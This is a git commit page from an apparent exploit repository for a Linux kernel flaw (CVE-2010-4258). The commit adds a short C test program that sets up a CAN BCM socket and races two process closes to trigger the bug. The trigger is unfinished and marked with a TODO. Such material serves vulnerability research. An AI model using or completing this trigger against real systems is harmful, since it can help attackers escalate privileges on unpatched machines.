diff options
| author |   Jason A. Donenfeld <Jason@zx2c4.com> | 2011-04-20 18:06:01 -0400 |
|---|---|---|
| committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-04-20 18:06:01 -0400 |
| commit | 30a4cec8986bf490a24b20c0063d07b1e953698c (patch) | |
| tree | 7beaeb6539cbc277eea632e8e2f75458f07e9a8a | |
| parent | Pidmap deref in the exploit. (diff) | |
| download | CVE-2010-4258-master.tar.xz CVE-2010-4258-master.zip | |
| -rw-r--r-- | bcm_test.c | 45 |
1 files changed, 45 insertions, 0 deletions
diff --git a/bcm_test.c b/bcm_test.c new file mode 100644 index 0000000..c0b72d9 --- /dev/null +++ b/bcm_test.c @@ -0,0 +1,45 @@ +#include <stdio.h> +#include <string.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <sys/ioctl.h> +#include <net/if.h> +#include <linux/can.h> +#include <linux/can/raw.h> + +#ifndef PF_CAN +#define PF_CAN 29 +#endif + +#ifndef CAN_BCM +#define CAN_BCM 2 +#endif + +int main() +{ + printf("[+] Creating BCM CAN socket.\n"); + int sock = socket(PF_CAN, SOCK_DGRAM, CAN_BCM); + if (sock < 0) { + printf("[-] No BCM CAN support.\n"); + return -1; + } + + printf("[+] Connecting to socket.\n"); + struct sockaddr_can addr; + memset(&addr, 0, sizeof(addr)); + addr.can_family = PF_CAN; + connect(sock, (struct sockaddr *)&addr, sizeof(addr)); + + printf("[+] Triggering the bug.\n"); + if (fork()) { + //TODO: Somehow jam the locking mechanism so release_sock hangs. + close(sock); + } else { + sleep(2); + close(sock); + _exit(0); + } + sleep(5); + + return 0; +} |